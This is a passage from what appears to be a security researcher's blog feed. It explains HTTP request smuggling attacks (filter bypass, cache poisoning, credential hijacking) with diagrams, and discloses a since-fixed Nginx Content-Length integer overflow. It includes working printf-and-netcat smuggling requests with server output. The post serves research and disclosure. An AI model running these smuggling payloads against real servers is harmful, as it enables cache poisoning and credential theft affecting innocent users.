        |                       |&amp;lt;--------- resp. Suzann-&amp;lt;
        |&amp;lt;-------- resp. Suzann-&amp;lt;                        |
        |                       |             \-Walter--&amp;gt;| [*]
        |                       |&amp;lt;---X----- resp. Walter-&amp;lt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The problem occurs at &lt;code&gt;[*]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Note here the &lt;code&gt;&amp;lt;--X---&lt;/code&gt; arrow, the middleware may not be really aware that a
Walter query was emitted, and can reject the response (and close it). But the
query has already been emitted, and this enough &lt;em&gt;could&lt;/em&gt; be a problem.&lt;/p&gt;

&lt;p&gt;You have an example of such issue in &lt;a href=&quot;http://regilero.github.io/security/english/2015/03/25/nginx-integer_truncation&quot; title=&quot;Nginx Integer Truncation&quot;&gt;my previous blog post&lt;/a&gt;
with Nginx as end server, Varnish as middleware, and very huge queries. In this
variant the Middleware receive a response while it still thinks the 1st query is
not even completly transmitted (just to say that between theory and real
exploits things can get quite complex).&lt;/p&gt;

&lt;p&gt;To avoid loosing the response from Walter the attacker can sometimes try to
pipeline some other queries. But the attacker goal is maybe just to run the
Walter query without being filtered (like accessing known security exploit on a
CMS where an HTTP filter prevents regular access to the backoffice).&lt;/p&gt;

&lt;h3&gt;Attack 2 : Replacement of regular response&lt;/h3&gt;

&lt;p&gt;The second type is &lt;strong&gt;defacement of Ivan&lt;/strong&gt;. On a successful attack by Suzann,
anyone requesting Ivan would get a Walter response. This can be used to prevent
regular use of Ivan (Deny of Service), but could also be worst, Walter the
wookie could contain some very dangerous content (like javascript code). Just
imagine Ivan is a regular javascript library on a CDN used by several thousands
of people daily, if the CDN sends the Walter javascript in place of this one...&lt;/p&gt;

&lt;p&gt;Queries have to be &lt;strong&gt;pipelined&lt;/strong&gt; by the attacker for this sort of attack.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Attacker]              [Middleware]             [End Server]
        |                        |                        |
        &amp;gt;-req. Suzann(+Walter) -&amp;gt;|                        |
        |-req. Ivan ---#2-------&amp;gt;|                        |
        |                        &amp;gt;--req. Suzann(+Walter)-&amp;gt;| [*1*]
        |                        |         \_req. Suzann-&amp;gt;|
        |                        |&amp;lt;-------- resp. Suzann -&amp;lt;
        |&amp;lt;----#1--- resp. Suzann &amp;lt;                        |
        |                        |         \_req. Walter-&amp;gt;| t1
        |                        &amp;gt;--req. Ivan -----------&amp;gt;| t2
        |                  [*2*] |&amp;lt;-------- resp. Walter -&amp;lt; t3
        |&amp;lt;----#2--- resp. Walter |                        |
        |                        |&amp;lt;---X-------- resp Ivan |
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;Suzann(+Walter)&lt;/code&gt; means that for the Middleware this is a simple &lt;code&gt;Suzann&lt;/code&gt;
request but for the backend this is two pipelined queries.&lt;br/&gt;
The middleware see a pipeline of 2 queries (Suzann/Ivan) but the backend
receive a pipeline of two queries (Suzann/Walter) and a third query (Ivan).&lt;/p&gt;

&lt;p&gt;In the timeline you also have 3 times, t1, t2 and t3.&lt;br/&gt;
The attack will fail if t2 occurs after t3 (for this the first Suzann may
sometimes be choosen to be slow enough to avoid sending the Walter response too
early).&lt;/p&gt;

&lt;p&gt;The regular Ivan response may be rejected by the middleware (which already have
2 responses), that&#39;s just a side effect.&lt;/p&gt;

&lt;p&gt;Here the biggest issue is at &lt;code&gt;[*2*]&lt;/code&gt;, the middleware receive a Walter response
which is assigned to ivan request (request #2).&lt;/p&gt;

&lt;p&gt;Suzann has performed some kind of Jedi trick on the empire dock&#39;s guards and
they feed the next ship requesting something from the docks with one or more
wookies instead of the regular cargo.&lt;/p&gt;

&lt;h3&gt;Wait, how do other requests/people get impacted in the second type of attack?&lt;/h3&gt;

&lt;p&gt;That&#39;s a very important question. In the first type of attack the goal was to
bypass a security, so the role of the attacker was obvious.&lt;/p&gt;

&lt;p&gt;On the second defacement type of attack the attacker seems the only guy impacted
by the defacement. But you need to get a large view of the picture.&lt;/p&gt;

&lt;p&gt;First usage is to get a response on the Walter query (if Walter was a forbidden
query like in type 1 attack).&lt;/p&gt;

&lt;p&gt;Second usage, if the middleware is a &lt;strong&gt;cache server&lt;/strong&gt; the goal of the attack is
&lt;strong&gt;cache poisoning&lt;/strong&gt;, where the faked response is stored on the wrong cache entry.
A successful attack will deface the responses for everybody, not only for the
attacker. This is the &lt;em&gt;obvious&lt;/em&gt; attack, very dramatic (Ivan was replaced by
Walter in the cache and this will be for the cache lifetime duration).&lt;/p&gt;

&lt;p&gt;But even without a caching problem an attacker can make a proxy server becomes
&lt;strong&gt;crazy&lt;/strong&gt;. On some successful attacks the proxy will mix queries from several
clients. The attacker queries will be mixed with some other innocent queries
from innocent clients, even without a cache, remember this point. Most
middlewares have to trust the backend responses timeline and when backend
responses goes wild strange things happen. This mix of communications between
different users is also in the last attack type (type 3, credential hijacking).
But we&#39;ll see in a coming article how user mix can happen without going to type
3.&lt;/p&gt;

&lt;h3&gt;Attack 3 : Credentials Hijacking&lt;/h3&gt;

&lt;p&gt;This third type of attack was referenced in the 2005 Watchfire study. Most proxy
are now engineered well enough to prevent this from hapenning. &lt;strike&gt;It is now very
hard to have a proxy sending a query to a backend, reusing the same connection
as the one used on a previous unclosed communication  (or I did not try
hard enough, maybe).&lt;/strike&gt;. I did miss some tests here, having backend connection
pooling is not rare at all. But usually it is done by HTTP agents which are robust
enough to avoid being transmitters of splitting attacks (@see next part for transmitters
and splitters).&lt;/p&gt;

&lt;p&gt;The trick was to inject a partial query in the stream, and wait for the regular
user query, coming in the same backend connection and added to the partial
request. It means the proxy is able to add some data in &lt;code&gt;[+]&lt;/code&gt; to a tcp/ip
connection with the backend that was unfinished in &lt;code&gt;[-]&lt;/code&gt;. But the proxy does not
know two queries were send, for the proxy there was only one query and the
response is already received.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;           [Attacker]               [Middleware]          [End Server]
                |                         |                     |
                &amp;gt;-req. Suzann[+Walter] --&amp;gt;|                     |
                |                         &amp;gt;-requ. Suzann ------&amp;gt;|
                |                         |&amp;lt;----- resp. Suzann  |
                |&amp;lt;---------- resp. Suzann |                     |
                |                         | [*]                 |
 [Innocent]     |                         | \-requ. Walter ----&amp;gt;|
     |          |                         | (unterminated)      | [-]
     &amp;gt;--------------------- req. Ivan ---&amp;gt;|                     |
     |                                    &amp;gt;-req. Ivan ---------&amp;gt;| [+]
     |                                    |&amp;lt;----- resp. Walter -&amp;lt;
     |&amp;lt;-------------------- resp. Walter -&amp;lt;                     |
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This was a complexe scheme, but for example the Ivan request could contain a
valid session that Walter did not have (&lt;strong&gt;cookies&lt;/strong&gt;, &lt;strong&gt;HTTP Authentication&lt;/strong&gt;).
Also this valid session was needed for Walter query to succeed.
Credentials used in Ivan query are stolen (&lt;strong&gt;hijacked&lt;/strong&gt;) for a &lt;code&gt;Walter&lt;/code&gt; query.&lt;/p&gt;

&lt;p&gt;Damages of such issues are very high (you can make user perform unwanted POST
actions, using his own credentials and rights). Keep alive and pipelines are not used
in most proxies while communicating with backends.&lt;br/&gt;
Implementing shared backends connections or pools is a dangerous thing, unless you are
very carefull of not being a splitting attack transmitter.&lt;/p&gt;

&lt;h3&gt;Transmitters and Splitters&lt;/h3&gt;

&lt;p&gt;In smuggling attacks you will need mainly two types of actors behaving
differently on some HTTP protocol issues.&lt;/p&gt;

&lt;p&gt;On the first part you need &lt;strong&gt;transmitters&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;A transmitter is an HTTP agent, a proxy, which receive an altered HTTP query and
transmits the alteration to an HTTP backend. When testing HTTP proxies you will
encounter a lot of proxies which are cleaning up strange queries (like you were
using tabulations as space separators, but the proxy is replacing tabulations
with spaces when talking to the backend). Here the transmitters, by definition,
is not cleaning up the &lt;em&gt;strange part&lt;/em&gt; of the request. The transmitters, also,
see the altered HTTP request as an unique query.&lt;/p&gt;

&lt;p&gt;The second actor of the attack is a &lt;strong&gt;splitter&lt;/strong&gt;, an involuntary accomplice.
This agent receive the evil request from the &lt;strong&gt;transmitter&lt;/strong&gt;.
For the splitter this transmitted request is not unique, it&#39;s a multiple request
(a pipeline) and this actor will emit several HTTP responses. This agent is
&lt;strong&gt;splitting&lt;/strong&gt; the request.&lt;br/&gt;
Sending 2 responses for one query is enough, but it may also be one hundred.&lt;br/&gt;
The splitter made a parsing error and detects a pipeline of queries (or the
transmitters made this error, not detecting it was really a pipeline).&lt;/p&gt;

&lt;p&gt;We&#39;ll use a typology for the next schemas:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;&amp;gt;----qA-----&amp;gt; : HTTP query for request A
&amp;lt;-----rAqA--&amp;lt; : HTTP response A matched with request A
&amp;lt;-X---rAqA--&amp;lt; : HTTP response A rejected (connection close for example)
&amp;lt;----*rAqB*-&amp;lt; : HTTP response A matched with request B (very Bad thing)
&amp;gt;--qA+(qB)--&amp;gt; : HTTP query for request A, Hiding a query B
       [*CP*] : Cache poisoning
       [*RS*] : Response Splitting
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The basic schema is:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Origin]            [transmitter]         [Splitter]
        |                    |                    |
        &amp;gt;-----qA+(qB)-------&amp;gt;|                    |
        |                    &amp;gt;-----qA+(qB)-------&amp;gt;| [*RS*]
        |                    |&amp;lt;-----------rAqA----&amp;lt;
        |&amp;lt;-----------rAqA----&amp;lt;                    |
        |                    |&amp;lt;-----------rBqB----&amp;lt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Here we have a security issue in &lt;code&gt;[*RS*]&lt;/code&gt; where a request splitting occurs.&lt;/p&gt;

&lt;p&gt;If the Splitting attack can be issued by an application issue &lt;strong&gt;you do not need
a transmitter&lt;/strong&gt; communicating an altered HTTP query.&lt;/p&gt;

&lt;p&gt;In terms of &lt;strong&gt;responsability&lt;/strong&gt; the HTTP splitter is having a real security issue.
Or at least that&#39;s what we could assume, when talking with project maintainers
it could be quite hard to have HTTP splitting issues considered as security
issues (let&#39;s hope this attitude will change in the future).&lt;br/&gt;
The transmitter &lt;strong&gt;could&lt;/strong&gt; detect the smuggling tentative and &lt;strong&gt;should&lt;/strong&gt; clean up
the query before transmitting, but that&#39;s usually not considered a security
issue, unless every other actor implementing the HTTP RFC would see 2 queries
when the transmitter is only seing one (something like an &lt;em&gt;inverted splitter&lt;/em&gt;).&lt;/p&gt;

&lt;p&gt;Using this sort of schema attack of type 1 (filters bypass) is already achieved
with the simple case.&lt;/p&gt;

&lt;p&gt;Attack of type 2 (defacement) needs a pipeline of queries. It also need a third
actor, a  &lt;strong&gt;target&lt;/strong&gt;. The target is something like a cache which will be the
final victim.&lt;br/&gt;
The target is usually also the transmitter.&lt;/p&gt;

&lt;p&gt;Here is a type2 issue:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Origin]        [transmitter-target]         [Splitter]
        |                    |                    |
        &amp;gt;-----qA+(qB)-------&amp;gt;|                    |
        &amp;gt;-----qC------------&amp;gt;|                    |
        |                    &amp;gt;-----qA+(qB)-------&amp;gt;| [*RS*]
        |                    |&amp;lt;-----------rAqA----&amp;lt;
        |&amp;lt;-----------rAqA----&amp;lt;                    |
        |                    &amp;gt;-----qC------------&amp;gt;|
        |             [*CP*] |&amp;lt;-----------rBqB----&amp;lt;
        |&amp;lt;-----------*rBqC*--&amp;lt;                    |
        |                    |&amp;lt;-X---------rCqC----&amp;lt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This sort of behavior can also go wrong without caching (no &lt;code&gt;[*CP*]&lt;/code&gt;) if you can
make the &lt;code&gt;&amp;lt;--*rBqC*--&amp;lt;&lt;/code&gt; response redirected to another user than the original
attacker (obviously this should never happen...).&lt;/p&gt;

&lt;p&gt;If the Splitting attack can be issued by an application issue &lt;strong&gt;you still do not
need a transmitter&lt;/strong&gt; but you need this actor to be a &lt;strong&gt;target&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;Encapsulating and Fingerprinting&lt;/h3&gt;

&lt;p&gt;In real life, the attacker may need to navigate through several
transmitters. Like hiting an HAProxy first, then an Apache mod_proxy, then a
Varnish and finally an Nginx (yes, that happens).&lt;/p&gt;

&lt;p&gt;The first job of the attacker is &lt;strong&gt;fingerprinting&lt;/strong&gt; the middleware. To identify
the layers present in the middleware you have some Headers in the responses
(like the &lt;code&gt;Server&lt;/code&gt; header or somes variations on &lt;code&gt;X-Cache&lt;/code&gt;). But you also have
the ability of checking the behaviors of the agents for each HTTP protocol error.&lt;/p&gt;

&lt;p&gt;Every agent can have is own list of rejected syntax errors. For example Nginx
will always reject an HTTP request using CR as line terminator instead of CRLF.
Apache would not. Varnish3 will understand CR end of lines, Varnish 4 would not,
etc.&lt;/p&gt;

&lt;p&gt;You can build a fingerprinting test to identify who is rejecting you (and
sometimes you&#39;ll get lucky and have the server signature in the error page).&lt;/p&gt;

&lt;p&gt;And you can also use encapsulation to target the fingerprinting test at a
precise level.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Encapsulation&lt;/strong&gt;, is the ability to hide your HTTP query in several layers of
HTTP smuggling issues. Usually the first layers are applying some strict rules
on the HTTP headers or location, but if you find a transmitter issue in the layer
you can carry in the request body another type of smuggling issue (one that
would be detected if used directly on this layer). The encapsulation is
available because usually the Proxy will not filter the request body (and
against a filter trying to decode the request body, you could use several layers
of Content-Transfer encoding).&lt;/p&gt;

&lt;p&gt;In this example Middleware1 is a transmitter to a first type of smuggling noted
&quot;()&quot; but would prevent any smuggling of a second type &quot;{}&quot;.
 We could say for example that the &quot;()&quot; smuggling issue is using a chunked
encoding issue and that the &quot;{}&quot; one is based on doubling Content-Length headers.&lt;br/&gt;
Middleware2 is a transmitter of the second type &quot;{}&quot; of smuggling (double
&lt;code&gt;Content-Length&lt;/code&gt; headers).&lt;br/&gt;
The End server is very sensible to the &quot;{}&quot; issue and is splitting the query.&lt;/p&gt;

&lt;p&gt;Goal of the attack is cache poisonning in Middleware2 with a &lt;code&gt;W&lt;/code&gt; query response
on a &lt;code&gt;I&lt;/code&gt; request. &lt;code&gt;W&lt;/code&gt; is &lt;strong&gt;forbidden&lt;/strong&gt; on Middleware 1 and also on Middleware 2.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;[Attacker]         [Middleware1]     [Middleware2]   [End Server]
    |            [transmitter ()]  [transmitter {}]  [ Splitter ]
    |                   |                |               |
    &amp;gt;-qS(+qA{+qW})-----&amp;gt;|                |               |
    &amp;gt;-qB --------------&amp;gt;|                |               |
    &amp;gt;-qI---------------&amp;gt;|                |               |
    |                   &amp;gt;-qS(+qA{+qW})--&amp;gt;| [*RS*]        |
    |                   |                &amp;gt;----qS--------&amp;gt;|
    |                   |                |&amp;lt;-----rSqS-----&amp;lt;
    |                   |&amp;lt;----rSqS-------&amp;lt;               |
    |&amp;lt;---------rSqS-----&amp;lt;                |               |
    |                   &amp;gt;-qB------------&amp;gt;|               |
    |                   |                &amp;gt;--qA{+qW}-----&amp;gt;| [*RS*]
    |                   |         [*CP*] &amp;lt;---------rAqA--&amp;lt;
    |                   |&amp;lt;---*rAqB*------&amp;lt;               |
    |&amp;lt;--------*rAqB*----&amp;lt;                |               |
    |                   &amp;gt;-qI------------&amp;gt;|               |
    |                   |         [*CP*] &amp;lt;---------rWqW--&amp;lt;
    |                   |&amp;lt;---*rWqI*------&amp;lt;               |
    |&amp;lt;--------*rWqI*----&amp;lt;                |               |
    |                   |                &amp;gt;--qB--&amp;gt;(...)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Just to add one step of complexity you can also imagine a system where an HTTP
response is forged (via a flaw in an application or via a stored attack), and
this HTTP response could contain a &lt;strong&gt;response splitting&lt;/strong&gt; attack,
something like &lt;code&gt;&amp;lt;--*rAqA(+rWqX)*--&amp;lt;&lt;/code&gt;. Securities are always stronger in request
filters than in response filters on proxies, and most project would reject
theses issues as securty problems (&quot;we have to trust the backend responses, you see, that&#39;s a
backend issue&quot;).&lt;/p&gt;

&lt;p&gt;If the attackers can guess the servers and versions at each step of the
middleware, and if a lot of smuggling issues exists in the ecosystem, a complex
and very targeted attack can be made.&lt;/p&gt;

&lt;p&gt;If you understood the previous paragraphs you are ready to test it (or to read
the &lt;a href=&quot;http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf&quot; title=&quot;HTTP Request Smuggling - watchfire (pdf)&quot;&gt;2005 Watchfire study&lt;/a&gt;).&lt;/p&gt;

&lt;h3&gt;SSL/HTTPS as a protection?&lt;/h3&gt;

&lt;p&gt;Well, no, not really.&lt;/p&gt;

&lt;p&gt;SSL is sometimes mentionned as one way of preventing HTTP Smuggling. It&#39;s not.&lt;/p&gt;

&lt;p&gt;Having your HTTP message transmission encoded in an SSL tunnel is not preventing
bad interpretation of the message by the HTTP agent. HTTP Smuggling occurs
&lt;em&gt;after&lt;/em&gt; the transmission. Maybe having SSL tunnelled through a proxy which is
not trying to understand the content of the message (a pipe) could prevent a
Smuggling issue on this proxy, but that&#39;s all. Mmmh, yes it could also make the
simple tests more complex to perform (as it&#39;s hard to communicate in SSL in a
telnet session) but that&#39;s not a real defense for this subject (not that you
should not use https for other reasons).&lt;/p&gt;

&lt;h2&gt;Testing HTTP&lt;/h2&gt;

&lt;p&gt;Usually an HTTP request is made by a browser. You have some really nice tools to
alter HTTP request on the browser for testing purpose. If you already try to
attack yourself (of course yourself) with XSS or HTML injections you certainly
already altered parameters on the queries with tools like Live HTTP Headers (and
 others), or maybe extracted curl queries from live queries.&lt;/p&gt;

&lt;p&gt;But for HTTP smuggling you will usually need to test HTTP &lt;strong&gt;without&lt;/strong&gt; a browser,
because you will need to make very bad queries, and browsers never does bad
queries. Well, in the past they was an issue end-of-line injections on Digest
 Authentication names or with bad separators on Ajax queries. But finding a flaw
in a browser that allows HTTP smuggling requests coming from &lt;em&gt;regular&lt;/em&gt; browsers
is an exception. Smuggling does not usually imply that Suzann is an innocent
smuggler using a regular browser.&lt;/p&gt;

&lt;p&gt;No, what you will need is the full control of all characters in a query. For
example you will need to control what characters are used as space separators or
end-of-line.&lt;/p&gt;

&lt;p&gt;Hopefully HTTP is a text based protocol, and is quite simple. If you never
tried it you can always try an HTTP session with a telnet on port 80 of your
server.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is &#39;^]&#39;.
GET / HTTP/1.1                &amp;lt;---start typing here... fast!
Host: foobar                  &amp;lt;---required header in HTTP/1.1
                              &amp;lt;--- last enter for end of request
HTTP/1.1 301 Moved Permanently  &amp;lt;-- and now the server response
Server: nginx
Date: Sat, 25 Jul 2015 16:02:21 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Keep-Alive: timeout=15
Location: http://foobar.example.com/
X-Frame-Options: SAMEORIGIN

&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;301 Moved Permanently&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;
&amp;lt;body bgcolor=&quot;white&quot;&amp;gt;
&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;301 Moved Permanently&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;
&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;nginx&amp;lt;/center&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;But you need to type fast, and do not have a nice control on characters.
The other method for fast testing is using &lt;code&gt;printf&lt;/code&gt; to print a query on screen:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ printf &#39;GET / HTTP/1.1\r\nHost:\tfoobar\r\n\r\n&#39;
GET / HTTP/1.1
Host:   foobar
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Or directly to the server (here I use &lt;strong&gt;netcat&lt;/strong&gt; instead of telnet for that):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ printf &#39;GET / HTTP/1.1\r\nHost:\tfoobar\r\n\r\n&#39; | nc 127.0.0.1 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 25 Jul 2015 16:02:21 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Keep-Alive: timeout=15
Location: http://foobar.example.com/
X-Frame-Options: SAMEORIGIN

&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;301 Moved Permanently&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;
&amp;lt;body bgcolor=&quot;white&quot;&amp;gt;
&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;301 Moved Permanently&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;
&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;nginx&amp;lt;/center&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;With this sort of queries you can test easily the response of the server to a
degraded HTTP query, let&#39;s for example try to replace all CR-LF (&lt;code&gt;\r\n&lt;/code&gt;) end of
lines with just CR (&lt;code&gt;\r&lt;/code&gt;).&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ printf &#39;GET / HTTP/1.1\rHost:\tfoobar\r\r&#39; | nc 127.0.0.1 80
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;400 Bad Request&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;
&amp;lt;body bgcolor=&quot;white&quot;&amp;gt;
&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;400 Bad Request&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;
&amp;lt;hr&amp;gt;&amp;lt;center&amp;gt;nginx&amp;lt;/center&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And you can do advanced queries with printf alone. Like a simple pipeline of
queries:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ printf &#39;GET /Suzann.html HTTP/1.1\r\nHost: example.com\r\n\nGET /ivan.html HTTP/1.1\nHost:example.com\r\n\r\n&#39; | nc 127.0.0.1 80
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Which becomes hard to read (and here we have only the strict minimum headers).&lt;/p&gt;

&lt;p&gt;Next step is to build your own tool. For my extensive tests I&#39;ve build my tools
with &lt;strong&gt;python&lt;/strong&gt;, using the &lt;code&gt;socket&lt;/code&gt; library you have a very nice low level HTTP
client where all the strange things are allowed, and you have an high level
language to compute sizes (hiding queries in chunks, counting bytes, etc),
 or to add SSL support.&lt;/p&gt;

&lt;p&gt;If you really want to study smuggling you will have to use &lt;strong&gt;tcpdump&lt;/strong&gt; or
&lt;strong&gt;wireshark&lt;/strong&gt; to study the transmission of the signal between the actors, who is
cleaning up the messages, what is not cleaned up, how does timers and size
thresholds alter the behaviors, etc.&lt;/p&gt;

&lt;p&gt;The final tool, &lt;strong&gt;the best one&lt;/strong&gt;, is &lt;strong&gt;the code&lt;/strong&gt;, do not be afraid of reading
the code (when available). Learn the protocol and check implementations, that&#39;s
the reason of open source code, open source needs critical eyes studying the
code. That&#39;s the reason of superior robustness for open source code, but you
will certainly discover that a lot of code still need to be fixed.&lt;/p&gt;

&lt;h2&gt;First final words&lt;/h2&gt;

&lt;p&gt;I&#39;ll end this article here, next things to come soon, with real world issues.
But while waiting for new contents you can already try to read some posts
and test your tools.&lt;/p&gt;

&lt;p&gt;If you are using HTTP (and who isn&#39;t?), and usually use reverse proxies, SSL
terminators, reverse proxy caches, my first advice is to check that you have
recent versions.
Smuggling issues are real, some have been fixed in 2015, avoid keeping old
versions in production.&lt;/p&gt;

&lt;p&gt;But I know this can be a hard task. So my second advice is to add an HTTP
cleaner in front of your infrastructure. Something like &lt;a href=&quot;http://www.haproxy.org&quot; title=&quot;HAProxy&quot;&gt;HAProxy&lt;/a&gt;. This
tool is very strong to protect against smugglers (but take recent versions, of
 course). Simply reading the &lt;a href=&quot;http://www.haproxy.org/download/1.6/doc/configuration.txt&quot; title=&quot;HAProxy configuration&quot;&gt;configuration documentation&lt;/a&gt; of this
product you can find an excellent introduction to the HTTP protocol, with common
pitfalls documented.&lt;/p&gt;
</description>
				<published>2015-10-04 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/security/2015/10/04/http_smuggling_in_2015_part_one/</link>
			</item>
		
			<item>
				<title>Nginx Integer Truncation</title>
				<description>&lt;p&gt;&lt;small&gt; &lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;http://makina-corpus.com/blog/metier/2015/debordement-dentiers-dans-nginx-fixe-en-1-7-11&quot;&gt;makina corpus&lt;/a&gt;.)&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;Nginx 1.7.11&lt;/h2&gt;

&lt;p&gt;A new 1.7.11 version of Nginx has just been released (24-03-2015) and if you look at the &lt;a href=&quot;http://nginx.org/en/CHANGES&quot;&gt;CHANGES file&lt;/a&gt; you can see this:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    *) Bugfix: in integer overflow handling.
           Thanks to Régis Leroy.
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;yes, that&#39;s me :-), the code diff is visible in &lt;a href=&quot;http://hg.nginx.org/nginx/rev/15a15f6ae3a2&quot;&gt;mercurial, here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The real fix committed is better than the one I originally submitted. But the interesting fact is that this was an &lt;strong&gt;integer overflow bug&lt;/strong&gt;. I do not think I were the first one to report this problem as, for example, on the openBSD httpd project documents like &lt;a href=&quot;http://www.openbsd.org/papers/httpd-asiabsdcon2015.pdf&quot;&gt;this one&lt;/a&gt; we can read:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;It turned out that nginx uses many calls with the idiom malloc(num * size) and does not attempt to detect integer overflows (...)&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Starting from this 1.7.11 version things should be better, but for all previous versions this could be used to make nasty things. To be honest I did not found any big issue exploiting it, but at least I&#39;ve found one way of using it with the Content-Length HTTP header.&lt;/p&gt;

&lt;h2&gt;For the record&lt;/h2&gt;

&lt;p&gt;I&#39;m currently working on my spare time around several HTTP Smuggling tricks, searching for differences between web servers in the way they manage badly formatted HTTP. I&#39;ll made some reports of my findings later. To make it short, HTTP Smuggling attacks are based on hidden http queries, ways to hide full or partial http requests from some http agents in a chain, it can be used for cache poisoning, DOS or security bypass.&lt;/p&gt;

&lt;p&gt;Anyway I was trying a set of bad-formatted http queries against Nginx, it was quite late -- well it was very late, something like 02:00 --. I should have been sleeping, and I was in fact starting to sleep on my keyboard.&lt;/p&gt;

&lt;p&gt;I was trying to send requests with &lt;em&gt;simple&lt;/em&gt; oneliners, on the command line, this way:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;printf &#39;POST /foo.html HTTP/1.1\015\012Host: www.dummy-host.example.com\015\012Content-Type: application/x-www-form-urlencoded\015\012Content-Length : 15\015\012Content-Length:104\015\012\015\012GET /fic3.html?GET http://www.dummy-host.example.com/fic2.html HTTP/1.1\015\012Host: www.dummy-host.example.com\015\012\015\012GET /fic1.html HTTP/1.1\015\012Host: www.dummy-host.example.com\015\012\015\012&#39;| netcat 127.0.0.1 80
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This one is rejected because it contains two Content-Length headers. Rejecting such requests is the base protection against HTTP smuggling.&lt;/p&gt;

&lt;p&gt;Sleeping with a finger on the keyboard key &#39;0&#39;, I ended-up sending that query (which is in fact only one query) -- if you wonder what are &lt;code&gt;\015&lt;/code&gt; and &lt;code&gt;\012&lt;/code&gt; they are the CR-CarriageReturn (\r) and LF-LineFeed (\n) ascii character, HTTP is like windows, it works with CRLF end of lines.--. I explode the oneliner on several lines for better readability:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;printf &#39;GET /fic1.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;Content-Type: application/x-www-form-urlencoded\015\012&#39;\
&#39;Content-Length:90000000000000000000000000000000000000000000000000000000000000015 \015\012&#39;\
&#39;\015\012123456789012345&#39;\
&#39;GET http://www.dummy-host.example.com/fic2.html HTTP/1.1\015\012&#39;\
&#39;Host: www.dummy-host.example.com\015\012&#39;\
&#39;\015\012&#39;| netcat 127.0.0.1 80
----------------
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sat, 28 Feb 2015 18:22:18 GMT
Content-Type: text/html
Content-Length: 41
Last-Modified: Sun, 08 Feb 2015 23:51:13 GMT
Connection: keep-alive
Accept-Ranges: bytes

&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;H1&amp;gt;FIRST&amp;lt;/H1&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sat, 28 Feb 2015 18:22:18 GMT
Content-Type: text/html
Content-Length: 42
Last-Modified: Sun, 08 Feb 2015 23:51:33 GMT
Connection: keep-alive
Accept-Ranges: bytes

&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;H1&amp;gt;SECOND&amp;lt;/H1&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Nginx responded to that query, it did not send me a &quot;413&quot; response, and I was awake enough to realize it. I have two valid responses for 1 single query.&lt;/p&gt;

&lt;p&gt;With a shorter Content-length you have the right behavior (an error 413):&lt;/p&gt;

